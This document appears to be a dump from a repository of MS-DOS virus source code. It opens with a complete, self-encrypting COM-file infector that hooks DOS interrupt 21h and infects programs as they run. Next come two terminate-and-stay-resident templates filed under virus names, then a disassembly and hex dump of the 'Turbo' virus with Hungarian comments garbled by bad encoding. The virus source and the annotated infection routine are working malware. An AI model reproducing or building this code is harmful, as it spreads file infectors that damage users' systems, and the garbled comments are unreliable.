org 100h
jmp short dummy1
db 'DY'
dummy1:
mov cx,length
mov si,offset enc_start
mov ah,0
enc_key equ $-1
dummy2:
sub byte [si],ah
inc si
add ah,0
enc_add equ $-1
loop dummy2
enc_start:
mov ah,2Dh
mov ch,0FFh
mov dx,cx
int 21h
cmp al,0FFh
jne nomore
mov ax,cs
dec ax
mov ds,ax
cmp byte [0],'Z'
jne nomore
mov ax,word [3]
sub ax,pgfsize
jc nomore
sub word [3],pgfsize
sub word [12h],pgfsize
mov es,word [12h]
mov si,110h
mov di,100h
mov cx,total
cld
rep movsb
xor ax,ax
mov ds,ax
mov si,84h
mov di,old21
movsw
movsw
cli
mov word [84h+2],es
mov word [84h],offset ni21
sti
nomore:
push cs
push cs
pop es
pop ds
mov bx,0000h ;return control to the
eof equ $-2 ;end user
jmp bx
xclose: jmp close
infect:
push cs
pop ds
push cs
pop es
db 0E4h,40h
mov byte [enc_key],al
mov ax,4300h ;use CHMOD to get file attr
xor dx,dx
int 21h
mov [0F0h],cx ;store attr in PSP
mov ax,4301h ;clear file attr with CHMOD
xor cx,cx
int 21h
mov ax,3D02h ;open file for read / write
int 21h
xchg bx,ax
lahf
push ax
mov ax,5700h ;get file date & time
int 21h
mov [0F2h],cx
mov [0F4h],dx
pop ax
sahf
jc xclose
mov ah,3Fh ;read from file
mov cx,total
mov dx,old
int 21h
cmp byte [old+0],'M' ;exe MZ ?
je xclose
cmp byte [old+0],'Z' ;exe ZM ?
je xclose
cmp word [old+2],'YD' ;allready infected?
je xclose
mov ax,4202h ;lseek to EOF
xor cx,cx
xor dx,dx
int 21h
cmp ah,0FAh
jae xclose
cmp ah,4
jb xclose
add ax,total+100h
mov word [00F6h],ax
mov ah,40h ;write to EOF
mov cx,total
mov dx,old
push cx
mov al,byte [enc_key]
mov si,dx
enc_app:
xor byte [si],al
inc si
loop enc_app
pop cx
int 21h
mov ah,40h ;write to EOF
mov cx,applen
mov dx,offset append
int 21h
mov ax,4200h ;lseek to beginning of file
xor cx,cx
xor dx,dx
int 21h
push [eof]
mov ax,word [00F6h]
mov [eof],ax
mov ah,byte [enc_key]
db 0E4h,40h
mov byte [enc_add],al
mov dl,al
mov si,100h
mov di,old
cld
mov cx,offset enc_start-100h
rep movsb
mov cx,length
enc:
lodsb
add al,ah
stosb
add ah,dl
loop enc
mov ah,40h ;write viral code
mov dx,old
mov cx,total
int 21h
pop [eof]
close:
mov ax,5701h
mov cx,[00F2h]
mov dx,[00F4h]
int 21h
mov ah,3Eh ;close file
int 21h
mov ax,4301h
mov cx,[00F0h]
xor dx,dx
int 21h
ret
append:
call $+3 ;replace org bytes
pop si
sub si,3+total
mov di,100h
mov cx,total
mov ah,byte [enc_key]
append_enc:
lodsb
xor al,ah
stosb
loop append_enc
mov ax,100h ;return IP to 100h when done
push ax
sub ax,ax ;zero regs
xor bx,bx
and cx,cx
sub dx,dx
xor si,si
and di,di
sub bp,bp
ret
applen equ $-offset append
ni21:
pushf
cmp ah,2Dh
jne Not_Time
cmp ch,0FFh
jne Not_Time
cmp ch,dh
jne Not_time
mov Al,0
popf
iret
Not_Time:
cld
push ax
push bx
push cx
push dx
push si
push di
push bp
push es
push ds
; cmp ah,41h
; jne Not_Parse
; mov ah,3Ch
; cli
; add sp,18
; sti
; popf
; jmp old21-1
Not_Parse:
cmp ax,4B00h
jne Not_Exec
mov si,dx
push cs
pop es
xor di,di
mov cx,128
rep movsb
mov ax,3524h
int 21h
push es
push bx
push cs
pop ds
mov ax,2524h
mov dx,offset ni24
int 21h
call infect
pop dx
pop ds
mov ax,2524h
int 21h
Not_Exec:
pop ds
pop es
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
popf
jmp far 0000:0000
old21 equ $-4
ni24: mov al,0
iret
db 'The Silence Of The Lambs!$'
total equ $-100h ;size
pgfsize equ (($*2)/16)+2
length equ $-offset enc_start
old equ $


307
MSDOS/Virus.MSDOS.Unknown.tsr.asm Normal file
View File

@ -0,0 +1,307 @@
; NOTE : This template is for .COM files only do not use for .EXE files!!
;
;
;
; Copyright 1986 by Dana Nowell - All rights reserved
;
; HISTORY:
; Version Date Name Description
; 1.0 11/10/86 dn first cut
; 1.01 11/21/86 dn Fixed memory allocation bug
; Added installation message
;
title TSR Template
NULL equ 00h
BELL equ 07h ; bell character
BACKSPACE equ 08h ; backspace character
TAB equ 09h ; tab character
LF equ 0ah ; line feed
F_FEED equ 0ch ; form feed
CR equ 0dh ; carriage return
EOF equ 1ah ; ctrl z ( end of file )
SPACE equ ' ' ; ascii space character
QUOTE equ '"'
SIGNATURE1 equ 6144h ; used for already
SIGNATURE2 equ 616eh ; resident check
DOS_INT equ 21h ; DOS function interrupt
DISP_CHAR equ 02h
GET_KEY equ 08h
DOS_SCR_MSG equ 09h
DOS_SET_INT equ 25h
DOS_RESIDENT equ 31h
DOS_GET_INT equ 35h
DOS_TERMINATE equ 4ch
DOS_STRING_TERM equ '$'
; Interrupt vectors used
HOOK_INT equ 1ch ; interrupt to be hooked ( timer tick now )
;------------------------------------------------------------------------------
;
; MACRO SECTION
;
;------------------------------------------------------------------------------
Version_msg macro
jmp short copyright_end
copyright_msg db CR, LF
db 'TSR Shell - Version 1.01', CR, LF
db 'Copyright 1986, Dana Nowell ', CR, LF, CR, LF
db 'May be distributed without license', CR, LF, '$'
copyright_end:
Msg copyright_msg
endm
Msg macro ptr
push dx
push ax
lea dx, ptr
mov ah, 09h
int 21h
pop ax
pop dx
endm
com segment para public 'code'
assume cs:com, ds:com, es:com
;------------------------------------------------------------------------------
;
; note: The PSP occurs at the beginning of the code segment
; for all programs. In COM files the code seg = data seg
;
;------------------------------------------------------------------------------
org 0
psp_start dw ? ; int 20h - possibly a block for unresolved
; externals during link ?
mem_size dw ? ; size of available memory in paragraphs
filler db ? ; reserved usually zero
dos_call db ? ; call
dd ? ; address of dos function handler
term_vector dd ? ; address of dos terminate routine
break_vector dd ? ; address of dos break routine
error_vector dd ? ; address of dos error routine
dos_reserved db 2 dup(?); reserved by dos
dos_handles db 20 dup(?) ; file handle array
environ_ptr dw ? ; seg of dos environment ( offset = 0 )
dos_work db 34 dup(?) ; dos work area
int_21h db ? ; int
db ? ; 21h
db ? ; retf ( return far )
reserved dw ? ; reserved by dos
fcb1_ext db 7 dup(?) ; fcb # 1 extension
fcb1 db 9 dup(?) ; fcb #1
fcb2_ext db 7 dup(?) ; fcb # 2 extension
fcb2 db 20 dup(?) ; fcb #2
;
; disk transfer area ( dta ) and parameter block occupy the same space
;
;
;dta db 128 dup(?) ; disk transfer area
param_len db ? ; length of parameter string ( excludes CR )
parameters db 127 dup(?) ; parameters
;------------------------------------------------------------------------------
;
; Note on standard fcb structure :
;
; The standard FCB is larger than the size reserved in the PSP if you
; intend to use to FCB data from the PSP move it to a different location.
;
;
; STANDARD STRUCTURE OF A FILE CONTROL BLOCK
;
;
; extension :
; offset length description
; -7 1 extension active flag ( 0ffh = active )
; -6 5 normally unused should be zeros
; -1 1 file attribute when extension is active
; 1 . . . . . . . 1 read-only
; 2 . . . . . . 1 . hidden
; 4 . . . . . 1 . . system
; 8 . . . . 1 . . . volume label
; 16 . . . 1 . . . . subdirectory
; 32 . . 1 . . . . . archive
; 64 . 1 . . . . . . unused
; 128 1 . . . . . . . unused
;
; fcb :
; offset length description
; 0 1 special drive number ( 1 byte )
; 0 = default
; 1 = a:
; 2 = b: etc
; 1 8 filename or device name
; 9 3 filename extension
; 12 2 current block number
; 14 2 record size
; 16 4 file size in bytes ( dos dir entry at open )
; 20 2 file date ( bit coded as in dir )
; 22 10 dos work area
; 32 1 current record number ( 0 - 127 )
; 33 4 random record number
;
;------------------------------------------------------------------------------
org 100h ; required for COM file ( skips PSP )
start:
jmp install ; install the demon
;-------------------------------------------------------------------
;
; resident data structures go here
;
;-------------------------------------------------------------------
old_int dd 0 ; original value of hooked interrupt
resident1 dw SIGNATURE1
resident2 dw SIGNATURE2
;-------------------------------------------------------------------
;
; new interrupt starts here
;
;-------------------------------------------------------------------
new_int:
pushf
sti ; must turn INT on if we're going to use them
;-------------------------------------------------------------------
;
; be well behaved and pass control to original int
;
;-------------------------------------------------------------------
popf
pushf
call dword ptr cs:old_int ; do old interrupt
iret ; bye bye
;------------------------------------------------------------------------------
;
; INSTALLATION DATA STRUCTURES AND CODE GO HERE
;
; WARNING WARNING WARNING - this area does not exist after installation
;
;------------------------------------------------------------------------------
last_resident_byte db 0 ; last resident byte
resident_flag dw 0 ; am I already resident ? ( 0 = NO )
install_msg db CR, LF, 'Installation Complete', CR, LF, '$'
already_installed_msg db CR, LF
db 'Already Installed - Installation Aborted'
db CR, LF, '$'
install proc near
Version_msg
mov al, HOOK_INT ; int to hook
mov ah, DOS_GET_INT ; get int(AL) vector ==> ES+BX
int DOS_INT ; do the int
lea si, old_int ; where to put old timer interrupt vector
mov [si], bx ; save the offset and segment
mov 2[si], es ; ( es also used in check resident )
call check_resident ; am I already resident ?
cmp resident_flag, 0
je not_resident
Msg already_installed_msg
mov ah, DOS_TERMINATE ; terminate & stay resident
mov al, 1 ; return value is 1 (already installed)
int DOS_INT ; bye-bye
not_resident:
mov dx, offset new_int ; offset of new timer interrupt
mov al, HOOK_INT ; timer tick
mov ah, DOS_SET_INT ; set int(AL) vector from DS+DX
int DOS_INT ; do the int
; program terminate and stay resident
Msg install_msg ; Display the installation message
mov dx, offset last_resident_byte
mov cl, 4 ; convert to paragraphs required to
shr dx, cl ; remain resident ( divide by 16 )
inc dx ; allow for any remainder of division
mov ah, DOS_RESIDENT ; terminate & stay resident
mov al, 0 ; return value is 0 (good return)
int DOS_INT ; bye-bye
install endp
;
; Check resident procedure
; requires es register to contain the segment address of
; the current location for the interrupt being hooked.
; use the DOS function 35h to obtain this information.
;
check_resident proc near
cmp es:resident1, SIGNATURE1
jne not_res
cmp es:resident2, SIGNATURE2
jne not_res
mov resident_flag, 1
not_res:
ret
check_resident endp
com ends
end start


296
MSDOS/Virus.MSDOS.Unknown.tsres.asm Normal file
View File

@ -0,0 +1,296 @@
;*************************************************************
;** Terminate-but-Stay-Resident **
;** Original from the "Programmer's Journal" **
;** Modified by Alroger L. Gomes Jr. **
;** Any comments/question send message for "Roger Gomes" **
;** on the PDSE BBS (408)735-7190. Have Fun! **
;*************************************************************
; Insert you program on line # 157.
Delay_Count Equ 36 ;36 ticks=approx. 2 seconds
; Locations of BIOS Data needed by the resident program
Bios_Data Segment at 40h
Org 17h
Kbd_Status dw ?
Org 6Ch
Low_Timer dw ?
Bios_Data EndS
Code Segment
Assume Cs:Code, Ds:Code, Es:Nothing, Ss:Nothing
Org 100h
Entry_Point:
Jmp Install
Hot_Keys dw 01010B
This_Time dw ?
Trig_Time dw ?
Dos_Busy Label dword
Dos_Busy_Off dw ?
Dos_Busy_Seg dw ?
Criterr_Flag db ?
Already8 db 0
MenuON db 0
;*** Replacement for Int 24h - critical Dos Error ***
Diverted_Int24:
Mov Cs:Criterr_Flag,1
Xor Al,Al
Iret
Int_24_Vect Label dword
Int_24_Off dw ?
Int_24_Seg dw ?
;***** ID CODE *****
Res_ID1 dw 'Al'
Res_ID2 dw 'ro'
Res_ID3 dw 'ge'
;*******************
;*** Replacement for Int 8 - Timer hardware Interrupt ***
Diverted_Int8:
Pushf
Call_Int8 db 09Ah
Int_8_Vect Label dword
Int_8_Off dw ?
Int_8_Seg dw ?
Cmp Cs:MenuOn,0
Je MenuNOT
Iret
MenuNOT:
Mov Cs:MenuOn,1
Push Ds
Push Bx
Lds Bx,Cs:Dos_Busy
Cmp Byte Ptr [Bx],0
Pop Bx
Pop Ds
Mov Cs:MenuOn,0
Jz Get_Bios_Data
Dos_is_Busy:
Iret
;*** Replacement for Int 28 - Generated by Dos, esp. during keyboard I/O ***
Diverted_Int28:
Pushf
Call_Int28 db 09Ah
Int_28_Vec Label dword
Int_28_Off dw ?
Int_28_Seg dw ?
Cmp Cs:MenuOn,0
Je Get_Bios_Data
Iret
Get_Bios_Data:
Mov Cs:MenuOn,1
Sti
Push Ds
Push Ax
Mov Ax,Bios_Data
Mov Ds,Ax
Assume Ds:Bios_Data
Mov Ax,Low_Timer
Mov Cs:This_time,Ax
Mov Ax,Kbd_Status
Push Cs
Pop Ds
Assume Ds:Code
Chk_Keys:
And Ax,Hot_Keys
Cmp Ax,Hot_Keys
Jne Back_to_Applic
Chk_Timer:
Mov Ax,This_Time
Cmp Ax,Trig_Time
Jb Time_is_Right
Sub Ax,Trig_Time
Sub Ax,Delay_Count
Jnc Time_is_Right
Back_to_Applic:
Pop Ax
Pop Ds
Mov Cs:MenuOn,0
Iret
Time_is_Right:
Mov Ax,This_Time
Mov Trig_Time,Ax
Pop Ax
Pop Ds
;***************************************************************************
; This is the Start of the application-dependent resident code
Start_Program:
Mov Cs:MenuOn,1
Push Ax
Push Bx
Push Cx
Push Dx
Push Si
Push Di
Push Bp
Push Ds
Push Es
Push Cs
Pop Ds
Mov Ax,3524h
Int 21h
Mov Int_24_Off,Bx
Mov Int_24_Seg,Es
Mov Ax,2524h
Mov Dx,Offset Diverted_Int24
Int 21h
;****************************************************************************
; Insert your program here.
;****************************************************************************
Restore_Int24:
Lds Dx,Int_24_Vect
Mov Ax,2524h
Int 21h
Pop Es
Pop Ds
Pop Bp
Pop Di
Pop Si
Pop Dx
Pop Cx
Pop Bx
Pop Ax
Mov Cs:MenuOn,0
Mov Cs:Already8,0
Iret
; This is the end off the applicant-dependent resident code
End_of_Res Label word
;***************************************************************************
; Installation
Install:
Mov Ax,Cs
Mov Ds,Ax
Mov Es,Ax
Mov Ah,9
Mov Dx,OffSet CopyRight
Int 21h
; Make sure that it is at least Dos 2.00
Mov Ah,30h
Int 21h
Or Al,Al
Jnz Chk_Vectors
Mov Dx,Offset BadDos_Msg
Mov Ah,9
Int 21h
Int 20h
; See if resident code is already Installed in Memory
Chk_Vectors:
Mov Ax,Cs
Mov Ds,Ax
Mov Es,Ax
Mov Ax,3508h
Int 21h
Cmp Word Ptr [Es:Bx-6],'Al'
Jne Not_Installed1
Cmp Word Ptr [Es:Bx-4],'ro'
Jne Not_Installed1
Cmp Word Ptr [Es:Bx-2],'ge'
Jne Not_Installed1
Mov Dx,Offset No_Install_Msg
Mov Ah,9
Int 21h
Mov Ax,4C01h
Int 21h
Not_Installed1:
Mov Ax,3577h
Int 21h
Mov Ax,Es
Cmp Ax,'Al'
Jne Not_Installed
Cmp Bx,'ro'
Jne Not_Installed
Mov Dx,Offset No_Install_Msg
Mov Ah,9
Int 21h
Mov Ax,4C01h
Int 21h
Not_Installed:
Mov Ax,Cs
Mov Ds,Ax
Mov Es,Ax
Push Es
Mov Ax,Cs
Mov Ds,Ax
Mov Es,Ax
Mov Ah,34h
Int 21h
Mov Dos_Busy_Off,Bx
Mov Dos_Busy_Seg,Es
Mov Ax,3508h
Int 21h
Mov Int_8_Off,Bx
Mov Int_8_Seg,Es
Mov Ax,Cs
Mov Es,Ax
Mov Ds,Ax
Mov Ax,2508h
Mov Dx,Offset Diverted_Int8
Int 21h
Mov Ax,'Al'
Mov Ds,Ax
Mov Dx,'ro'
Mov Ax,2577h
Int 21h
Mov Ax,Cs
Mov Ds,Ax
Mov Ax,3528h
Int 21h
Mov Int_28_Off,Bx
Mov Int_28_Seg,Es
Mov Ax,2528h
Mov Dx,Offset Diverted_Int28
Int 21h
Pop Es
; Terminate and stay resident
Mov Dx,Offset Install
Int 27h
No_Install_Msg db 'xxxx is already in memory!',10,13,10,13,'$'
BadDos_Msg db 'DOS 2.0 or greater needed!',10,13,10,13,'$'
CopyRight db 'xxxx by ?????? - yyyy $'
Code EndS
End Entry_Point

324
MSDOS/Virus.MSDOS.Unknown.turbo.asm Normal file
View File

@ -0,0 +1,324 @@
@ virus unassembled list:
`90.07.21.
Magyar zat: Kv ri L szl¢
Tel.: (41) 21-822 07-13:20 mh.
21-033 18:00-
0EB0:0100 E80000 CALL 0103
0EB0:0103 90 NOP
0EB0:0104 5E POP SI ;SI=IP b zisc¡m
0EB0:0105 50 PUSH AX
0EB0:0106 51 PUSH CX
0EB0:0107 B82135 MOV AX,3521
0EB0:010A CD21 INT 21 ;INT 21h c¡m lekrdezse
0EB0:010C 8CC0 MOV AX,ES
0EB0:010E 3D0040 CMP AX,4000 ;mem¢ri ban vam ?
0EB0:0111 7220 JB 0133 ;nincs nem 4000h f”l
;mutat!
0EB0:0113 83EE03 SUB SI,+03 ;JMP+op hossza
0EB0:0116 BA8601 MOV DX,0186 ;eredeti JMP+op cime
0EB0:0119 03F2 ADD SI,DX ;b zishoz
0EB0:011B 8B1C MOV BX,[SI]
0EB0:011D 8B4C02 MOV CX,[SI+02]
0EB0:0120 891E0001 MOV [0100],BX ;eredeti JMP+op.
0EB0:0124 890E0201 MOV [0102],CX ;visszarak sa
0EB0:0128 8CD8 MOV AX,DS
0EB0:012A 8EC0 MOV ES,AX ;ES=DS
0EB0:012C 59 POP CX
0EB0:012D 58 POP AX
0EB0:012E BB0001 MOV BX,0100
0EB0:0131 FFE3 JMP BX ;ugr s 0100h-ra igy
;lefut az eredeti prg.
;Ha nincs a mem¢ri ban
0EB0:0133 A10200 MOV AX,[0002] ;PSP-ben a RAM tetejnek
;paragrafusc¡me
0EB0:0136 2D0008 SUB AX,0800
0EB0:0139 8EC0 MOV ES,AX ;virus £j szegmens
0EB0:013B BF0001 MOV DI,0100
0EB0:013E 83EE03 SUB SI,+03 ;JMP+op. hossza
0EB0:0141 B90002 MOV CX,0200 ;virus mrete
0EB0:0144 F3 REPZ
0EB0:0145 A4 MOVSB ;virus m sol sa az
;£j szegmensbe
0EB0:0146 8C06F200 MOV [00F2],ES ;£j szegmensc¡m
0EB0:014A B95501 MOV CX,0155 ;£j szegmensben a be-
;lpsi offset-je
0EB0:014D 890EF000 MOV [00F0],CX
0EB0:0151 FF2EF000 JMP FAR [00F0] ;ugr s az £j seg.:0155
;belpsi pont
0EB0:0155 8CC1 MOV CX,ES
0EB0:0157 8CD8 MOV AX,DS
0EB0:0159 26 ES:
0EB0:015A A38C02 MOV [028C],AX ;rgi seg (eredeti
;program)
0EB0:015D B80001 MOV AX,0100
0EB0:0160 26 ES:
0EB0:0161 A38A02 MOV [028A],AX ;0100h offset
0EB0:0164 8CC0 MOV AX,ES
0EB0:0166 8ED8 MOV DS,AX ;DS=£j seg
0EB0:0168 B82135 MOV AX,3521
0EB0:016B CD21 INT 21 ;INT 21h lekrdezse
0EB0:016D 2E CS:
0EB0:016E 891E7C02 MOV [027C],BX ;INT 21h offset
0EB0:0172 8CC3 MOV BX,ES
0EB0:0174 2E CS:
0EB0:0175 891E7E02 MOV [027E],BX ;INT 21h segment
0EB0:0179 B8A501 MOV AX,01A5 ;£j INT 21h offset
0EB0:017C 8BD0 MOV DX,AX
0EB0:017E 8BC1 MOV AX,CX
0EB0:0180 8ED8 MOV DS,AX
0EB0:0182 B82125 MOV AX,2521
0EB0:0185 CD21 INT 21 ;INT 21h ellop sa
0EB0:0187 8B168602 MOV DX,[0286] ;JMP+op.
0EB0:018B 8B0E8802 MOV CX,[0288] ;operandus
0EB0:018F A18C02 MOV AX,[028C] ;eredeti prg.seg.
0EB0:0192 8ED8 MOV DS,AX
0EB0:0194 89160001 MOV [0100],DX ;eredeti JMP+op.
0EB0:0198 890E0201 MOV [0102],CX ;visszarak sa
0EB0:019C 8EC0 MOV ES,AX
0EB0:019E 59 POP CX
0EB0:019F 58 POP AX
0EB0:01A0 2E CS:
0EB0:01A1 FF2E8A02 JMP FAR [028A] ;ugr s az eredeti
;programra
;£j INT 21h rutin
0EB0:01A5 90 NOP
0EB0:01A6 80FC3D CMP AH,3D ;file nyit s ?
0EB0:01A9 7403 JZ 01AE ;igen
0EB0:01AB E9C000 JMP 026E ;ugr s az eredeti
;INT 21h-ra
0EB0:01AE 1E PUSH DS
0EB0:01AF 06 PUSH ES
0EB0:01B0 50 PUSH AX
0EB0:01B1 53 PUSH BX
0EB0:01B2 51 PUSH CX
0EB0:01B3 52 PUSH DX
0EB0:01B4 57 PUSH DI
0EB0:01B5 56 PUSH SI
;Ellen”rzi hogy COM file-e
0EB0:01B6 8BFA MOV DI,DX ;Filespec.
0EB0:01B8 8CDE MOV SI,DS
0EB0:01BA 8EC6 MOV ES,SI
0EB0:01BC B000 MOV AL,00
0EB0:01BE B93200 MOV CX,0032
0EB0:01C1 FC CLD
0EB0:01C2 F2 REPNZ
0EB0:01C3 AE SCASB ;PATH lem sol sa
0EB0:01C4 83EF03 SUB DI,+03
0EB0:01C7 B84F4D MOV AX,4D4F ;'OM' AX-ba
0EB0:01CA 26 ES:
0EB0:01CB 3B05 CMP AX,[DI] ;'OM' ?
0EB0:01CD 7403 JZ 01D2 ;igen
0EB0:01CF E99400 JMP 0266 ;eredeti INT 21h-ra
0EB0:01D2 B82E43 MOV AX,432E ;'.C' AX-be
0EB0:01D5 26 ES:
0EB0:01D6 3B45FE CMP AX,[DI-02] ;'.C' ?
0EB0:01D9 7403 JZ 01DE ;biztos hogy COM file!
0EB0:01DB E98800 JMP 0266 ;eredeti INT 21h-ra
0EB0:01DE B43D MOV AH,3D ;file nyit sa
0EB0:01E0 B002 MOV AL,02 ;¡r s/olvas s
0EB0:01E2 E89000 CALL 0275 ;INT 21h hiv sa
0EB0:01E5 7303 JNB 01EA ;ha nincs hiba
0EB0:01E7 EB7D JMP 0266 ;eredeti INT 21h-ra
;File mret ellen”rzs
0EB0:01E9 90 NOP
0EB0:01EA 8BD8 MOV BX,AX ;kezel”
0EB0:01EC B90000 MOV CX,0000
0EB0:01EF BA0000 MOV DX,0000
0EB0:01F2 B80242 MOV AX,4202 ;file vgre poz.
0EB0:01F5 E87D00 CALL 0275 ;INT 21h hiv sa
0EB0:01F8 3D00FE CMP AX,FE00
0EB0:01FB 7369 JNB 0266 ;nagyobb INT 21h-ra
;Eredeti 4 byte beolvas sa (JMP+operandusa)
0EB0:01FD 2D0300 SUB AX,0003 ;JMP+op. hossza
0EB0:0200 2E CS:
0EB0:0201 A38102 MOV [0281],AX
0EB0:0204 B80042 MOV AX,4200 ;file elejre poz.
0EB0:0207 B90000 MOV CX,0000
0EB0:020A BA0000 MOV DX,0000
0EB0:020D E86500 CALL 0275 ;INT 21h hiv sa
0EB0:0210 B43F MOV AH,3F ;olvas s
0EB0:0212 B90400 MOV CX,0004 ;4 byte
0EB0:0215 BA8602 MOV DX,0286 ;ide olvassa
0EB0:0218 8CCF MOV DI,CS
0EB0:021A 8EDF MOV DS,DI ;DS=CS
0EB0:021C E85600 CALL 0275 ;INT 21h hiv sa
0EB0:021F B005 MOV AL,05
0EB0:0221 3A068902 CMP AL,[0289]
0EB0:0225 743F JZ 0266
;Virusra mutat¢ JMP+op be¡r sa a programba
0EB0:0227 B80042 MOV AX,4200 ;file elejre poz.
0EB0:022A B90000 MOV CX,0000
0EB0:022D 8BD1 MOV DX,CX
0EB0:022F E84300 CALL 0275 ;INT 21h hiv sa
0EB0:0232 B0E9 MOV AL,E9 ;JMP k¢dja
0EB0:0234 2E CS:
0EB0:0235 A28002 MOV [0280],AL ;leteszi
0EB0:0238 B005 MOV AL,05
0EB0:023A 2E CS:
0EB0:023B A28302 MOV [0283],AL
0EB0:023E B90400 MOV CX,0004 ;4 byte
0EB0:0241 BA8002 MOV DX,0280 ;JMP+op. kezdete
0EB0:0244 0E PUSH CS
0EB0:0245 1F POP DS
0EB0:0246 B440 MOV AH,40 ;ki¡r s
0EB0:0248 E82A00 CALL 0275 ;INT 21h hiv sa
;1C0h byte ki¡r sa FERT™Z<E284A2>S!
0EB0:024B B80242 MOV AX,4202 ;file vgre poz.
0EB0:024E B90000 MOV CX,0000
0EB0:0251 8BD1 MOV DX,CX
0EB0:0253 E81F00 CALL 0275 ;INT 21h hiv sa
0EB0:0256 BA0001 MOV DX,0100 ;0100h -t¢l
0EB0:0259 B9C001 MOV CX,01C0 ;01c0h byte
0EB0:025C B440 MOV AH,40 ;ki¡r sa
0EB0:025E E81400 CALL 0275 ;INT 21h hiv sa
;Ffert”z”tt file z r sa
0EB0:0261 B43E MOV AH,3E
0EB0:0263 E80F00 CALL 0275 ;INT 21h hiv sa
0EB0:0266 5E POP SI
0EB0:0267 5F POP DI
0EB0:0268 5A POP DX
0EB0:0269 59 POP CX
0EB0:026A 5B POP BX
0EB0:026B 58 POP AX
0EB0:026C 07 POP ES
0EB0:026D 1F POP DS
0EB0:026E 90 NOP
0EB0:026F 2E CS:
0EB0:0270 FF2E7C02 JMP FAR [027C] ;ugr s az eredeti
;INT 21h-ra
0EB0:0274 CF IRET
;Eredeti INT 21h hiv sa
0EB0:0275 9C PUSHF ;IRET miatt!
0EB0:0276 2E CS:
0EB0:0277 FF1E7C02 CALL FAR [027C] ;INT 21h hiv sa
0EB0:027B C3 RET
0EB0:027C 16 PUSH SS
0EB0:027D 130C ADC CX,[SI]
0EB0:027F 02E9 ADD CH,CL
0EB0:0281 1C00 SBB AL,00
0EB0:0283 050101 ADD AX,0101
0EB0:0286 EB12 JMP 029A
0EB0:0288 90 NOP
0EB0:0289 49 DEC CX
0EB0:028A 0001 ADD [BX+DI],AL
0EB0:028C DD0A ESC 29,[BP+SI][BP+SI]
0EB0:028E 0A0D OR CL,[DI]
0EB0:0290 9A6476206D CALL 6D20:7664
0EB0:0295 69 DB 69
0EB0:0296 6E DB 6E
0EB0:0297 64 DB 64
0EB0:0298 65 DB 65
0EB0:0299 6E DB 6E
0EB0:029A 206E61 AND [BP+61],CH
0EB0:029D 67 DB 67
0EB0:029E 7974 JNS 0314
0EB0:02A0 7564 JNZ 0306
0EB0:02A2 A073A3 MOV AL,[A373]
0EB0:02A5 6E DB 6E
0EB0:02A6 61 DB 61
0EB0:02A7 6B DB 6B
0EB0:02A8 2120 AND [BX+SI],SP
0EB0:02AA 54 PUSH SP
0EB0:02AB 7572 JNZ 031F
0EB0:02AD 62 DB 62
0EB0:02AE 6F DB 6F
0EB0:02AF 204020 AND [BX+SI+20],AL
0EB0:02B2 2E CS:
0EB0:02B3 2E CS:
0EB0:02B4 2E CS:
0EB0:02B5 202E2E2E AND [2E2E],CH
0EB0:02B9 201A AND [BP+SI],BL
0EB0:02BB 0000 ADD [BX+SI],AL
0EB0:02BD 0000 ADD [BX+SI],AL
0EB0:02BF 005374 ADD [BP+DI+74],DL
0EB0:02C2 20E8 AND AL,CH
0EB0:02C4 4E DEC SI
0EB0:02C5 01E9 ADD CX,BP
0EB0:02C7 51 PUSH CX
0EB0:02C8 FF2EC606 JMP FAR [06C6]
0EB0:02CC 050006 ADD AX,0600
0EB0:02CF 2E CS:
0EB0:02D0 C70609001000 MOV WORD PTR [0009],0010
0EB0:02D6 EB7B JMP 0353
0EB0:02D8 90 NOP
0EB0:02D9 2E CS:
0EB0:02DA C70609000A00 MOV WORD PTR [0009],000A
0EB0:02E0 EB71 JMP 0353
0EB0:02E2 90 NOP
0EB0:02E3 2E CS:
0EB0:02E4 FE060600 INC BYTE PTR [0006]
0EB0:02E8 56 PUSH SI
0EB0:02E9 8BF3 MOV SI,BX
0EB0:02EB 83C302 ADD BX,+02
0EB0:02EE 3E DS:
0EB0:02EF 8B7202 MOV SI,[BP+SI+02]
0EB0:02F2 2E CS:
0EB0:02F3 803E060000 CMP BYTE PTR [0006],00
0EB0:02F8 750A JNZ 0304
0EB0:02FA AC LODSB
0EB0:02FB 3C00 CMP AL,00
0EB0:02FD 743B JZ 033A
0EB0:02FF E80F03 CALL 0611
Megjegyzs:
Nincs k ros hat sa. Megold sa kit<EFBFBD>n, hiszen mg egy system
info lekrse esetn sem kkisebb a DOS  lltal l tott mem¢-
ria mret, mint a fizikai RAM mret!
DUMP
0EB0:0100 E8 00 00 90 5E 50 51 B8-21 35 CD 21 8C C0 3D 00 ....^PQ.!5.!..=.
0EB0:0110 40 72 20 83 EE 03 BA 86-01 03 F2 8B 1C 8B 4C 02 @r ...........L.
0EB0:0120 89 1E 00 01 89 0E 02 01-8C D8 8E C0 59 58 BB 00 ............YX..
0EB0:0130 01 FF E3 A1 02 00 2D 00-08 8E C0 BF 00 01 83 EE ......-.........
0EB0:0140 03 B9 00 02 F3 A4 8C 06-F2 00 B9 55 01 89 0E F0 ...........U....
0EB0:0150 00 FF 2E F0 00 8C C1 8C-D8 26 A3 8C 02 B8 00 01 .........&......
0EB0:0160 26 A3 8A 02 8C C0 8E D8-B8 21 35 CD 21 2E 89 1E &........!5.!...
0EB0:0170 7C 02 8C C3 2E 89 1E 7E-02 B8 A5 01 8B D0 8B C1 |......~........
0EB0:0180 8E D8 B8 21 25 CD 21 8B-16 86 02 8B 0E 88 02 A1 ...!%.!.........
0EB0:0190 8C 02 8E D8 89 16 00 01-89 0E 02 01 8E C0 59 58 ..............YX
0EB0:01A0 2E FF 2E 8A 02 90 80 FC-3D 74 03 E9 C0 00 1E 06 ........=t......
0EB0:01B0 50 53 51 52 57 56 8B FA-8C DE 8E C6 B0 00 B9 32 PSQRWV.........2
0EB0:01C0 00 FC F2 AE 83 EF 03 B8-4F 4D 26 3B 05 74 03 E9 ........OM&;.t..
0EB0:01D0 94 00 B8 2E 43 26 3B 45-FE 74 03 E9 88 00 B4 3D ....C&;E.t.....=
0EB0:01E0 B0 02 E8 90 00 73 03 EB-7D 90 8B D8 B9 00 00 BA .....s..}.......
0EB0:01F0 00 00 B8 02 42 E8 7D 00-3D 00 FE 73 69 2D 03 00 ....B.}.=..si-..
0EB0:0200 2E A3 81 02 B8 00 42 B9-00 00 BA 00 00 E8 65 00 ......B.......e.
0EB0:0210 B4 3F B9 04 00 BA 86 02-8C CF 8E DF E8 56 00 B0 .?...........V..
0EB0:0220 05 3A 06 89 02 74 3F B8-00 42 B9 00 00 8B D1 E8 .:...t?..B......
